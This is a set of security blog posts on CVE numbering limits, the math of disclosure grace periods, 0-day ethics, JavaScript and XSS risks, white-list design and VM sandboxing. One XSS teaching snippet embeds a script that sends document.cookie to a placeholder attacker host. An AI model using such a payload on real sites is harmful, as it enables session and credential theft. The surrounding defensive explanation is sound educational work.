Posts by pmeunier

2007: The year of the 9,999 vulnerabilities?

A look at the National Vulnerability Database statistics will reveal that the number of vulnerabilities found yearly has greatly increased since 2003:

Year    Vulnerabilities    % Increase
2002    1959               N/A
2003    1281               -35%
2004    2367               85%
2005    4876               106%
2006    6605               35%



Average yearly increase (including the 2002-2003 decline): 48%

6605 * 1.48 ≈ 9775
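
As a quick sanity check, here is a minimal sketch of that back-of-the-envelope projection, using the counts from the table above:

```python
# Year-over-year growth of reported vulnerabilities (counts from the table above).
counts = {2002: 1959, 2003: 1281, 2004: 2367, 2005: 4876, 2006: 6605}
years = sorted(counts)
increases = [counts[y] / counts[y - 1] - 1 for y in years[1:]]
avg = sum(increases) / len(increases)   # about 0.48, including the 2002-2003 decline
print(round(avg, 2))                    # 0.48
print(round(counts[2006] * 1.48))       # 9775, the projection for 2007
```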

So, that’s not quite 9999, but fairly close.  There’s enough variance that hitting 9999 in 2007 seems a plausible event.  If not in 2007, then it seems likely that we’ll hit 9999 in 2008.  So, what does it matter?



MITRE’s CVE effort uses a numbering scheme for vulnerabilities that can accommodate only 9999 vulnerabilities per year:  CVE-YEAR-XXXX.  Many products and vulnerability databases that are CVE-compatible (e.g., my own Cassandra service, CIRDB, etc…) use a field of fixed size just big enough for that format.  We’re facing a problem similar to the year-2000 overflow, although much smaller in scope.  When the board of editors of the CVE was formed, the total number of vulnerabilities known, not those found yearly, was in the hundreds.  A yearly number of 9999 seemed astronomical;  I’m sure that anyone who had brought that up as a concern back then would have been laughed at.  I felt at the time that it would take a security apocalypse to reach that.  Yet here we are, so consider this fair warning to everyone using or developing CVE-compatible products.



Kudos to the National Vulnerability Database and the MITRE CVE teams for keeping up under the onslaught.  I’m impressed.

Vulnerability disclosure grace period needs to be short, too short for patches

One of the most convincing arguments for full disclosure is that while the polite security researcher waits for the vendor to issue a patch, the vulnerability MAY already have been sold and used to exploit systems;  therefore, everyone in charge of administering a system has a right to know ALL the details so that they can protect themselves, and that right trumps all other rights.

That argument rests upon the premise that if one person found the vulnerability, it is possible for others to find it as well.  The key word here is “possible”, not “likely”, or so I thought when I started writing this post.  After all, vulnerabilities can be hard to find, which is a reason why products are released with vulnerabilities.  How likely is it that two security researchers will find the same vulnerability? 

Mathematically speaking, the chance that two successful security researchers (malicious or not) will find the same flaw is similar to the birthday problem.  Let’s assume that there are X security researchers, each finding one vulnerability out of N vulnerabilities available to be found.  In 2006, 6560 vulnerabilities were found, and 4876 in 2005 (according to the National Vulnerability Database).  Let’s assume that the number of vulnerabilities available to be found in a year is about 10,000;  this is almost surely an underestimate.  I’ll assume that all of these are equally likely to be found.  An additional twist on the birthday problem is that people are entering and leaving the room;  not all X are present at the same time.  This is because we worry about two vulnerabilities being found within the grace period given to a vendor.

If there are more successful researchers in the room than vulnerabilities, then necessarily there has been a collision.  Let’s say that the grace period given to a vendor is one month, so Y = X/12.  Then, there would need to be 120,000 successful security researchers for collisions to be guaranteed.  For fewer researchers, the likelihood of two vulnerabilities being the same is then 1 - exp(-Y(Y-1)/(2N)) (cf. the birthday problem on Wikipedia).  Let’s assume that there are 5000 successful researchers in a given year, to match the average number of vulnerabilities reported in 2005 and 2006.  The probability that two researchers find the same vulnerability within a given grace period is:

Grace Period    Probability
1 month         0.9998
1 week          0.37
1 day           0.01
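
These values can be reproduced with a short script.  Here is a minimal sketch under the stated assumptions (5000 successful researchers per year, about 10,000 findable vulnerabilities, and Y taken as the ceiling of X divided by the number of grace periods in a year):

```python
from math import ceil, exp

X = 5000    # successful researchers per year (assumption from the text)
N = 10000   # vulnerabilities available to be found in a year (assumption from the text)

for label, periods_per_year in [("1 month", 12), ("1 week", 52), ("1 day", 365)]:
    Y = ceil(X / periods_per_year)         # researchers "in the room" during the grace period
    p = 1 - exp(-Y * (Y - 1) / (2 * N))    # birthday-problem approximation
    print(f"{label}: {p:.4f}")             # ~0.9998, ~0.37, ~0.01
```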


In other words, nowadays the grace period given to a vendor should be on the order of one or two days, if we only take this risk into account.  Has it always been like this?

Let’s assume that in any given year, there are twice as many vulnerabilities available to be found as there are reported vulnerabilities.  If we set N = 2X and fix the grace period to one week, what was the probability of collision in different years?  The formula becomes 1 - exp(-Y(Y-1)/(4X)), where Y is the ceiling of X/52.

Year         Vulnerabilities Reported    Probability
1988-1996                                0
1997         252                         0.02
1998         246                         0.02
1999         918                         0.08
2000         1018                        0.09
2001         1672                        0.15
2002         1959                        0.16
2003         1281                        0.11
2004         2363                        0.20
2005         4876                        0.36
2006         6560                        0.46
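
The same kind of sketch reproduces this table (again a rough illustration under the stated assumptions, not an exact reconstruction of how the original numbers were computed):

```python
from math import ceil, exp

# Reported vulnerabilities per year, as listed in the table above.
reported = {1997: 252, 1998: 246, 1999: 918, 2000: 1018, 2001: 1672,
            2002: 1959, 2003: 1281, 2004: 2363, 2005: 4876, 2006: 6560}

for year, X in sorted(reported.items()):
    Y = ceil(X / 52)                       # researchers active within a one-week grace period
    p = 1 - exp(-Y * (Y - 1) / (4 * X))    # 2N = 4X because we assume N = 2X
    print(year, f"{p:.2f}")
```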

So, according to this table, a grace period of one week would have seemed an acceptable policy before 2000, perhaps fair in 2000-2003, but is now unacceptably long.  These calculations are of course very approximate, but they should be useful enough to serve as guidelines.  They show, much to my chagrin, that people arguing for the full and immediate disclosure of vulnerabilities may have a point.



In any case, we can’t afford, as a matter of national and international cyber-security, to let vendors idly waste time before producing patches;  vendors need to take responsibility, even if the vulnerability is not publicly known.  This exercise also illustrates why a patch-it-later attitude could have seemed almost excusable years ago, but not now.  These figures are a serious problem for managing security with patches, as opposed to secure coding from the start:  I believe that it is not feasible anymore for traditional software development processes to issue patches before the threat of malicious disclosure and exploits becomes significant.  Finally, the grace period that we can afford to give vendors may be too short for them to issue patches, but that doesn’t mean it should be zero.

Note:  the astute reader will remark that the above statistic is for any two vulnerabilities to match, whereas for patching we are talking about a specific vulnerability being discovered independently.  The odds of that specific occurrence are much smaller.  However, systematic patch management has to consider all vulnerabilities at once, which brings us back to the above calculations.
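
To put a number on “much smaller”, here is a rough sketch under the same assumptions (5000 researchers per year, N = 10,000, one-week grace period), comparing the chance that one specific vulnerability is independently rediscovered against the chance that any two findings collide:

```python
from math import ceil, exp

X, N = 5000, 10000
Y = ceil(X / 52)                           # researchers active within one week

p_specific = 1 - (1 - 1 / N) ** Y          # one *specific* vulnerability rediscovered: ~0.01
p_any = 1 - exp(-Y * (Y - 1) / (2 * N))    # *any* two findings collide: ~0.37
print(round(p_specific, 3), round(p_any, 2))
```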

 

Security Vigilantes Becoming Small-Time Terrorists

Vulnerability disclosure is such a painful issue.  However, some people are trying to make it as painful as possible.  They slap and kick people with the release of 0-day vulnerabilities, and tell them it’s for their own good.  In their fantasies, sometime in the future, we’ll be thanking them.  In reality, they make me feel sympathy for the vendors. 

They cite disillusionment with the “responsible disclosure” process.  They believe that this process forces them somehow to wait indefinitely on the pleasure of the vendor.  Whereas it is true that many vendors won’t and don’t fix known issues unless they are known publicly or are threatened with a public disclosure, it bemuses me that these people are unwilling to give the vendor a chance and wait a few weeks.  They use the excuse of a few bad vendors, or a few occurrences of delays in fixes, even “user smugness”, to systematically treat vendors and their clients badly.  This shows recklessness, impatience, intransigence, bad judgment and lack of discernment. 

I agree that reporting vulnerabilities correctly is a thankless task.  Besides my previous adventure with a web application, when reporting a few vulnerabilities to CERT/CC, I received no replies ever, not even an automated receipt.  It was like sending messages into a black hole.  Some vendors can become defensive and unpleasant instead.  However, that doesn’t justify abandoning courtesy;  give the other side the chance to be the first to behave badly.  If you don’t do at least that, then you are part of the problem.  As in many real-life problems, the first one to use his fists is the loser.

What these security vigilantes are really doing is taking the vendor’s clients hostage just to make an ideological point.  That is, they use the threat of security exploits to coerce or intimidate vendors and society for the sake of their objectives.  They believe that the ends justify the means.  Blackmail is done for personal gain, so what they are doing doesn’t fit the blackmail category, and it’s more than simple bullying.  Whereas the word “terrorism” has been overused and brandished too often as a scarecrow, compare the above to the definition of terrorism.  I realize that using this word, even correctly, can raise a lot of objections.  If you accept that a weaker form of terrorism is the replacement of physical violence with other threats, then it would be correct to call these people “small-time terrorists” (0-day pun intended).  Whatever you want to call them, in my opinion they are no longer just vigilantes, and certainly not heroes.  The only thing that can be said for them is that, at least, they didn’t try to profit directly from the disclosures.

Finally, let me make clear that I want to be informed, and I want disclosures to happen.  However, I’m certain that uncivil 0-day disclosures aren’t part of the answer.  There is interesting coverage of this and related issues at CNET.

VMworld 2006: How virtualization changes the security equation

This session was very well attended (roughly 280 people), which is encouraging.  In the following, I will mix all the panel responses together without differentiating the sources.

It was said that virtualization can make security more acceptable, by contrast to past security solutions and suggested practices that used to be hard to deploy or adopt.  Virtual appliances can help security by introducing more boundaries between various data center functions, so if one is compromised the entire data center hasn’t been compromised.  One panel member argued that virtual appliances (VA) can leverage the expertise of other people.  So, presumably if you get a professional VA it may be installed better and more securely than an average system admin could, and you could pass liability on to them (interestingly, someone else told me outside this session that liability issues were what stopped them from publishing or selling virtual appliances).

I think you may also inherit problems due to the vendor philosophy of delivering functional systems over secure systems.  As always, the source of the virtual appliances, the processes used to create them, the requirements that they were designed to meet, should be considered in evaluating the trust that can be put into them.  Getting virtual appliances doesn’t necessarily solve the hardening problem.  Except, now instead of having one OS to harden, you have to repeat the process N times, where N is the number of virtual appliances you deploy.

As a member of the panel argued, virtualization doesn’t make things better or worse, it still all depends on the practices, processes, procedures, and policies used in managing the data center and the various data security and recovery plans.  Another pointed out that people shouldn’t assume that virtual appliances or virtualization provide security out-of-the-box.  Out of all malicious software, currently 4-5% check if they are running inside a virtual machine;  this may become more common.

It was said that security is not the reason why people are deploying virtualization now.  Virtualization is not as strong as using several different physical, specialized machines, due to the shared resources and shared communication channels.  Virtualization would be much more useful on the client side than on the data center for improving security.  Nothing else of interest was said.

Unfortunately, there was no time for me to ask what the panel thought of the idea of opening VMware to plugins that could perform various security functions (taint tracking and various attack protection schemes, IDS, auditing, etc…).  After the session one of the panel members mentioned that this was being looked at, and that it raised many problems, but would not elaborate.  In my opinion, it could trump the issue of Microsoft (supposedly) closing Windows to security vendors, but they thought of everything!  Microsoft’s EULA forbids running certain versions of Windows on virtual machines.  I wonder about the wisdom of this, as restricting the choices of security solutions can only hurt Microsoft and their users.  Is this motivated by the fear of people cracking the DRM mechanism(s)?  Surely just the EULA can’t prevent that—crackers will do what they want.  As Windows could simply check to see if it is running inside a VM, DRMed content could be protected by refusing to be performed under those conditions, without making all of Windows unavailable.  The fact that the most expensive version of Windows allows running inside a virtual machine (even though performing DRMed content is still forbidden) hints that it’s mostly due to marketing greed, but on the whole I am puzzled by those policies.  It certainly won’t help security research and forensic investigations (are forensic examiners exempt from the licensing/EULA restrictions?  I wonder).

VMworld 2006:  Teaching (security) using virtual labs

This talk by Marcus MacNeill (Surgient) discussed the Surgient Virtual Training Lab used by CERT-US to train military personnel in security best practices, etc…  I was disappointed because the talk didn’t discuss the challenges of teaching security and the lessons CERT learned doing so, but instead focused on how the product could be used in a teaching environment.  Not surprisingly, the Surgient product resembles both VMware’s Lab Manager and ReAssure.  However, the Surgient product doesn’t support sharing images or stopping and restarting work (e.g., development work by users), at least from what I saw;  if it does, it wasn’t mentioned.  They mentioned that they had patented technologies involved, which is disturbing (raise your hand if you like software patents).  ReAssure meets (or will soon, thanks to the VIX API) all of the requirements he discussed for teaching, except for student shadowing (seeing what a student is attempting to do).  So, I would be very interested in seeing teaching labs using ReAssure as a support infrastructure.  There are of course other teaching labs using virtualization that have been developed at other universities and colleges;  the challenge is of course to be able to design courses and exercises that are portable and reusable.  We can all gain by sharing these, but for that we need a common infrastructure on which all these exercises would be valid.

VMworld 2006:  ReAssure (CERIAS), VIX and Lab Manager (VMware)

The conference is surprisingly huge (6000 people).  Virtualization is obviously important to IT now.  I am looking forward to the security-related talks (I’ll post about them later).  Here are a few notes from the sessions I attended:

  • Saturday a VMware team shot a video of yours truly talking about ReAssure (of course I became tongue-tied when the camera was turned on!).  It will be presented at the general session Wednesday morning.  I hope it generates interest in ReAssure!
  • The VIX API session on Tuesday morning was very interesting.  It will enable the remaining automation functionality of ReAssure.  It allows automating the powering on and off of virtual machines, taking snapshots, transferring files (e.g., results) between the host and guest OS, and even starting programs in the guest OS!  It was introduced with VMware Server 1.0 last summer, but I hadn’t noticed.  It is still a work in progress, though;  there’s support only for C, Perl and COM (no Python, although I was told that there was a SourceForge project for that).
  • The VMware Lab Manager (introduced last summer) is very much like ReAssure.  Except, ReAssure doesn’t have IP conflicts, and in ReAssure all experiments (“deployed configurations”) are independent and their traffic is isolated with VLANs.  In some respects, VMware Lab Manager is more sophisticated, and in others it is more primitive.  For example, all networks in Lab Manager are flat (and apparently all experiments even share the same network), whereas ReAssure supports complex networks.  To resolve IP conflicts, Lab Manager uses “fenced networks”, which is a NAT hack.  Lab Manager is also limited to fibre channel storage, and is tied to VMware ESX while disabling most of what makes ESX flexible and interesting (ReAssure uses the free VMware Server).  I’m excited about the VIX API (see above) because it will bring ReAssure beyond Lab Manager by allowing snapshots, suspend and resume functionality, etc…  I wonder what I need to do to make ReAssure better known and more widely adopted.  I haven’t found any bugs in it for a while, so I think I’ll officially release the first final (not beta) version very soon (e.g., Friday or next week).

So you think AJAX and Web 2.0 are all that and a bag of chips

You know, I would feel a lot better about this technology if someone had fixed basic problems with the way browsers handle JavaScript, with JavaScript policy specifications and compliance testing, and if there were good, usable and mature static analysis tools that could detect cross-site scripting vulnerabilities (Pixy by Jovanovic et al. comes to mind as a promising open source tool), and if people used them.  These problems have been known for a long time.

  1. Same origin policy and shared servers.  So, my home page is http://homes.cerias.purdue.edu/~pmeunier/;  if I put a nasty JavaScript there, it can access or change the contents of other CERIAS home pages if you follow a link from my page, or if my page opens another home page for you.  I made a demo which, for Safari users, displays Adam Hammer’s home page URL but with contents of my choosing (with apologies to Adam).  Firefox is a bit smarter and the URL displayed is instead that of my page, which could clue attentive users in to the fact that the content really comes from elsewhere.  Adam doesn’t actually have a home page there.
  2. Modern browsers still can’t survive a visit to this site (WARNING!  Your browser will likely crash or become unusable when you click buttons on that site):  Nasty Javascript Bombs (I didn’t try all browsers, like Opera, but Safari died horrible deaths)
  3. Modern browsers can still be captured:  Firefox users visit (WARNING!  you won’t be able to return) the jail, do not collect $200.
  4. Searching for JavaScript-related vulnerabilities in 2006 in the National Vulnerability Database gives 124 matches (and the year is not even over).  Three of those are accidental hits (because “javascript” was part of a file name or such).  About 50% are cross-site scripting vulnerabilities, which could include the above JavaScript (and likely worse code than changing your choice of hero).  About 40% are coding errors in the JavaScript implementation.  About 10% are still issues with the enforcement of JavaScript default security policies, or things that should explicitly be stated as part of default policies (e.g., CVE-2006-2900 and CVE-2006-2894, abusing JavaScript keystroke events to trick users into typing where they didn’t mean to).  Cross-site scripting vulnerabilities are hard to avoid because scripts can be embedded almost anywhere inside HTML.  The separation between code (JavaScript) and data (HTML) is flimsy and complex (see the sketch after this list).  I predict that XSS vulnerabilities will be to AJAX applications what buffer overflows and format string vulnerabilities are to C:  a real pain.  There is no sign that browsers have matured enough yet to be trusted in handling JavaScript safely, and this will likely continue for many years.
  5. Perfectly compliant JavaScript and browsers can be used to scan internal networks and even perform limited exploits.
  6. JavaScript seems to be used most of the time to perform tasks that are user-unfriendly (hide user interface elements and generally remove control from the user, create pop-unders, show ads, track you by history, etc…).  So, I should expose myself to these, and the above and future vulnerabilities, so you can program something that’s a little slicker, or poorly duplicates the functionality of executables on my system?  Huh.
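
To illustrate point 4 above, here is a minimal sketch of the code/data separation problem (the comment string and page snippet are made up for illustration):  untrusted input pasted directly into HTML becomes code, while encoding it at output time keeps it inert data.

```python
from html import escape

# Hypothetical untrusted input submitted by a visitor.
user_comment = '<script>document.location="http://evil.example/?c=" + document.cookie</script>'

# Naive templating: the "data" is interpreted as code once the browser parses the page.
unsafe_page = "<p>Comment: " + user_comment + "</p>"

# Encoding at output time keeps the comment as plain text.
safe_page = "<p>Comment: " + escape(user_comment) + "</p>"

print(unsafe_page)
print(safe_page)
```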

So, tell me again;  do you really want to build castles on that foundation?  It sounds like a bad idea to me.  We can always hope that eventually, AJAX horror stories (to come) will drive security improvements, but I’d rather not be in the crowd of early sufferers.  At least, please do me a favor and honor the principle of graceful degradation, so that if I visit your web site with JavaScript turned off, I can still make some use of it.

Reporting Vulnerabilities is for the Brave

I was involved in disclosing a vulnerability found by a student to a production web site using custom software (i.e., we didn’t have access to the source code or configuration information).  As luck would have it, the web site got hacked.  I had to talk to a detective in the resulting police investigation.  Nothing bad happened to me, but it could have, for two reasons. 

The first reason is that whenever you do something “unnecessary”, such as reporting a vulnerability, police wonder why, and how you found out.  Police also wonder:  if you found one vulnerability, could you have found more and not reported them?  Who did you disclose that information to?  Did you get into the web site, and do anything there that you shouldn’t have?  It’s normal for the police to think that way.  They have to.  Unfortunately, it makes it very uninteresting to report any problems.

A typical difficulty encountered by vulnerability researchers is that administrators or programmers often deny that a problem is exploitable or is of any consequence, and request a proof.  This got Eric McCarty in trouble—the proof is automatically a proof that you breached the law, and can be used to prosecute you!  Thankfully, the administrators of the web site believed our report without trapping us by requesting a proof in the form of an exploit and fixed it in record time.  We could have been in trouble if we had believed that a request for a proof was an authorization to perform penetration testing.  I believe that I would have requested a signed authorization before doing it, but it is easy to imagine a well-meaning student being not as cautious (or I could have forgotten to request the written authorization, or they could have refused to provide it…).  Because the vulnerability was fixed in record time, it also protected us from being accused of the subsequent break-in, which happened after the vulnerability was fixed, and therefore had to use some other means.  If there had been an overlap in time, we could have become suspects.

The second reason that bad things could have happened to me is that I’m stubborn and believe that in a university setting, it should be acceptable for students who stumble across a problem to report vulnerabilities anonymously through an approved person (e.g., a staff member or faculty) and mechanism.  Why anonymously?  Because student vulnerability reporters are akin to whistleblowers.  They are quite vulnerable to retaliation from the administrators of web sites (especially if it’s a faculty web site that is used for grading).  In addition, student vulnerability reporters need to be protected from the previously described situation, where they can become suspects and possibly unjustly accused simply because someone else exploited the web site around the same time that they reported the problem.  Unlike security professionals, they do not understand the risks they take by reporting vulnerabilities (several security professionals don’t yet either).  They may try to confirm that a web site is actually vulnerable by creating an exploit, without ill intentions.  Students can be guided to avoid those mistakes by having a resource person to help them report vulnerabilities. 

So, as a stubborn idealist I clashed with the detective by refusing to identify the student who had originally found the problem. I knew the student enough to vouch for him, and I knew that the vulnerability we found could not have been the one that was exploited.  I was quickly threatened with the possibility of court orders, and the number of felony counts in the incident was brandished as justification for revealing the name of the student.  My superiors also requested that I cooperate with the detective.  Was this worth losing my job?  Was this worth the hassle of responding to court orders, subpoenas, and possibly having my computers (work and personal) seized?  Thankfully, the student bravely decided to step forward and defused the situation. 

As a consequence of that experience, I intend to provide the following instructions to students (until something changes):

  1. If you find strange behaviors that may indicate that a web site is vulnerable, don’t try to confirm if it’s actually vulnerable.
  2. Try to avoid using that system as much as is reasonable.
  3. Don’t tell anyone (including me), don’t try to impress anyone, don’t brag that you’re smart because you found an issue, and don’t make innuendos.  However much I wish I could, I can’t keep your anonymity and protect you from police questioning (where you may incriminate yourself), a police investigation gone awry and miscarriages of justice.  We all want to do the right thing, and help people we perceive as in danger.  However, you shouldn’t help when it puts you at the same or greater risk.  The risk of being accused of felonies and having to defend yourself in court (as if you had the money to hire a lawyer—you’re a student!) is just too high.  Moreover, this is a web site, an application;  real people are not in physical danger.  Forget about it.
  4. Delete any evidence that you knew about this problem.  You are not responsible for that web site, it’s not your problem—you have no reason to keep any such evidence.  Go on with your life.
  5. If you decide to report it against my advice, don’t tell or ask me anything about it.  I’ve exhausted my limited pool of bravery—as other people would put it, I’ve experienced a chilling effect.  Despite the possible benefits to the university and society at large, I’m intimidated by the possible consequences to my career, bank account and sanity.  I agree with HD Moore, as far as production web sites are concerned: “There is no way to report a vulnerability safely”.



Edit (5/24/06): Most of the comments below are interesting, and I’m glad you took the time to respond.  After an email exchange with CERT/CC, I believe that they can genuinely help by shielding you from having to answer questions from and directly deal with law enforcement, as well as from the pressures of an employer.  There is a limit to the protection that they can provide, and past that limit you may be in trouble, but it is a valuable service. 

What is Secure Software Engineering?

A popular saying is that “Reliable software does what it is supposed to do.  Secure software does that and nothing else” (Ivan Arce).  However, how do we get there, and can we claim that we have achieved the practice of an engineering science?  The plethora of vulnerabilities found every year (thousands, and that’s just in software that matters or is publicly known) suggests not.  Does that mean that we don’t know how, or that it is just not put into practice for reasons of ignorance, education, costs, market pressures, or something else?

The distinction between artisanal work and engineering work is well expressed in the SEI (Software Engineering Institute) work on capability maturity models.  Levels of maturity range from 1 to 5: 

  1. Ad-hoc, individual efforts and heroics
  2. Repeatable
  3. Defined
  4. Managed
  5. Optimizing (Science)

 
  Artisanal work is individual work, entirely dependent on the (unique) skills of the individual and personal level of organization.  Engineering work aims to be objective, independent from one individual’s perception and does not require unique skills.  It should be reproducible, predictable and systematic.

  In this context, it occurred to me that the security community often suggests using methods that have artisanal characteristics.  We are also somewhat hypocritical (in the academic sense of the term, not deceitful, just not thinking through critically enough).  The methods that are suggested to increase security actually rely on practices we decry.  What am I talking about?  I am talking about black lists.

  A common design error is to create a list of “bad” inputs, bad characters, or other undesirable things.  This is a black list;  it often fails because the enumeration is incomplete, or because the removal of bad characters from the input can result in the production of another bad input which is not caught (and so on recursively).  It turns out more often than not that there is a way to circumvent or fool the black list mechanism.  Black lists fail also because they are based on previous experience, and only enumerate *known* bad input.  The recommended practice is the creation of white lists, that enumerate known good input.  Everything else is rejected. 
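
  To make the contrast concrete, here is a minimal sketch (the field, the characters and the pattern are made up for illustration) of the two approaches applied to validating a user-supplied name:

```python
import re

BAD_CHARS = set(";'\"<>|&")  # black list: enumerate characters we already know are bad

def blacklist_validate(name):
    # Rejects only what we thought to enumerate; anything we missed slips through.
    return not any(c in BAD_CHARS for c in name)

GOOD_NAME = re.compile(r"[A-Za-z0-9_]{1,32}")  # white list: enumerate known-good input

def whitelist_validate(name):
    # Accepts only input matching the known-good pattern; everything else is rejected.
    return GOOD_NAME.fullmatch(name) is not None

for candidate in ["alice_42", "bob\x00", "../etc/passwd"]:
    print(repr(candidate), blacklist_validate(candidate), whitelist_validate(candidate))
# The black list happily accepts the null byte and the path traversal string,
# because nobody enumerated them; the white list rejects both without having
# to anticipate them.
```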

  When I teach secure programming, I go through often repeated mistakes, and show students how to avoid them.  Books on secure programming show lists upon lists of “sins” and errors to avoid.  Those are blacklists that we are in effect creating in the minds of readers and students!  It doesn’t stop there.  Recommended development methods (solutions for repeated mistakes) also often take the form of black lists.  For example, risk assessment and threat modeling require expert artisans to imagine, based on past experience, what are likely avenues of attack, and possible damage and other consequences.  The results of those activities are dependent upon unique skill sets, are irreproducible (ask different people and you will get different answers), and attempt to enumerate known bad things.  They build black lists into the design of software development projects. 

  Risk assessment and threat modeling are appropriate for insurance purposes in the physical world, because the laws of physics and gravity on earth aren’t going to change tomorrow.  The experience is collected at geographical, geological and national levels, tabulated and analyzed for decades.  However, in software engineering, black lists are doomed to failure, because they are based on past experience, and need to face intelligent attackers inventing new attacks.  How good can that be for the future of secure software engineering? 

  Precious few people emphasize development and software configuration methods that result (with guarantees) in the creation of provably correct code.  This of course leads into formal methods (and languages like SPARK and the correctness by construction approach), but not necessarily so.  For example, I was recently educated on the existence of a software solution called AppArmor (Suse Linux, Crispin Cowan et al.).  This solution is based on fairly fine-grained capabilities, and granting to an application only known required capabilities;  all the others are denied.  This corresponds to building a white list of what an application is allowed to do;  the developers even say that it can contain and limit a process running as root.  Now, it may still be possible for some malicious activity to take place within the limits of the granted capabilities (if an application was compromised), but their scope is greatly limited.  The white list can be developed simply by exercising an application throughout its normal states and functions, in normal usage.  Then the list of capabilities is frozen and provides protection against unexpected conditions.
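
  The learn-then-freeze pattern behind this approach can be sketched abstractly as follows (an illustration of the idea only, not AppArmor’s actual profile syntax or implementation):

```python
class CapabilityProfile:
    """Illustrative learn-then-enforce white list of (operation, target) pairs."""

    def __init__(self):
        self.allowed = set()
        self.learning = True

    def record(self, operation, target):
        # Learning mode: exercise the application through its normal functions
        # and remember every capability it actually used.
        if self.learning:
            self.allowed.add((operation, target))

    def freeze(self):
        # Freeze the profile; from now on it acts as a permissive white list.
        self.learning = False

    def check(self, operation, target):
        # Enforcement mode: anything not observed during normal use is denied,
        # even if the (possibly compromised) application requests it.
        return self.learning or (operation, target) in self.allowed


profile = CapabilityProfile()
profile.record("read", "/etc/myapp.conf")      # hypothetical paths for illustration
profile.record("write", "/var/log/myapp.log")
profile.freeze()
print(profile.check("write", "/var/log/myapp.log"))  # True: needed for normal operation
print(profile.check("write", "/etc/passwd"))         # False: outside the frozen white list
```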

  We need to come up with more white list methods for both development and configuration, and move away from black lists.  This is the only way that secure software development will become secure software engineering.

Edit (4/16/06): Someone pointed out the site http://blogs.msdn.com/threatmodeling/ to me.  It is interesting because it shows awareness of the challenge of getting from an art to a science.  It also attempts to abstract the expert knowledge into an “attack library”, which makes explicit its black list nature.  However, they don’t openly acknowledge the limitations of black lists.  Whereas we don’t currently have a white list design methodology that can replace threat modeling (it is useful!), it’s regrettable that the best everyone can come up with is a black list. 

Also, it occurred to me since writing this post that AppArmor isn’t quite a pure white list methodology, strictly speaking.  Instead of being a list of known *safe* capabilities, it is a list of *required* capabilities.  The difference is that the list of required capabilities, due to the granularity of capabilities and the complexity emerging from composing different capabilities together, is a superset of what is safe for the application to be able to do.  What to call it then?  I am thinking of “permissive white list” for a white list that allows more than necessary, vs a “restrictive white list” for a white list that possibly prevents some safe actions, and an “exact white list” when the white list matches exactly what is safe to do, no more and no less.

Using Virtual Machines to Defend Against Security and Trust Failures

According to the National Vulnerability Database (http://nvd.nist.gov), the number of vulnerabilities found every year increases:  1253 in 2003, 2343 in 2004, and 4734 in 2005.  We take security risks not only by choosing a specific operating system, but also by installing applications and services.  We take risks by browsing the web, because web sites insist on running code on our systems:  JavaScript, Flash (ActionScript), Java, ActiveX, VBscript, QuickTime, and all the plug-ins and browser extensions imaginable.  Applications we pay for want to probe the network to make sure there isn’t another copy running on another computer, creating a vector by which malicious replies could attack us.

  Games refuse to install in unprivileged accounts, so they can run their own integrity checkers with spyware qualities with full privileges (e.g., WoW, but others do the same, e.g., Lineage II), that in turn can even deny you the capability to terminate (kill) the game if it hangs (e.g., Lineage II).  This is done supposedly to prevent cheating, but allows the game companies full access and control of your machine, which is objectionable.  On top of that those games are networked applications, meaning that any vulnerability in them could result in a complete (i.e., root, LocalSystem) compromise. 

  It is common knowledge that if a worm like MyTob compromises your system, you need to wipe the drive and reinstall everything.  This is in part because these worms are so hard to remove, as they attack security software and will prevent firewalls and virus scanners from functioning properly.  However there is also a trust issue—a rootkit could have been installed, so you can’t trust that computer anymore.  So, if you do any sensitive work or are just afraid of losing your work in progress, you need a dedicated gaming or internet PC.  Or do you?

  VMware offers on their web site a free download of VMware Player, as well as a "browser appliance" based on Firefox and Ubuntu Linux.  The advantage is that you don’t need to install and *trust* Firefox.  Moreover, you don’t need to trust Internet Explorer or any other browser anymore.  If a worm compromises Firefox, or malicious JavaScripts change settings and take control of Firefox, you may simply trash the browser appliance and download a new copy.  I can’t overemphasize how much less work this is compared to reinstalling Windows XP for the nth time, possibly having to call the license validation phone line, and frantically trying to find a recent backup that works and isn’t infected too.  As long as VMware Player can contain the infection, your installation is preserved.  Also hosted on the VMware site are various community-created images allowing you to test various software at essentially no risk, and with no configuration work!

  After experiencing this, I am left to wonder:  why aren’t all applications like a VMware "appliance" image, and the operating system like VMware Player?  They should be.  Efforts to engineer software security have obviously failed to contain the growth of vulnerabilities and security problems.  Applying the same solutions to the same problems will keep resulting in failures.  I’m not giving up on secure programming and secure software engineering, as I can see promising languages, development methods and technologies appearing, but at the same time I can’t trust my personal computers, and I need to compartmentalize by buying separate machines.  This is expensive and inconvenient.  Virtual machines provide us with an alternative.  In the past, storing entire images of operating systems for each application was unthinkable.  Nowadays, storage is so cheap and abundant that the size of "appliance" images is no longer an issue.  It is time to virtualize the entire machine;  all I now require from the base operating system is to manage a file system and be able to launch VMware Player, with at least a browser appliance to bootstrap…  Well, not quite.  Isolated appliances are not so useful;  I want to be able to transfer documents from appliance to appliance.  This is easily accomplished with a USB memory stick, or perhaps a virtual drive that I can mount when needed.  This shared storage could become a new propagation vector for viruses, but it would be very limited in scope.

  Virtual machine appliances, anyone?

Note (March 13, 2006):  Virtual machines can’t defend against cross-site scripting vulnerabilities (XSS), so they are not a solution for all security problems.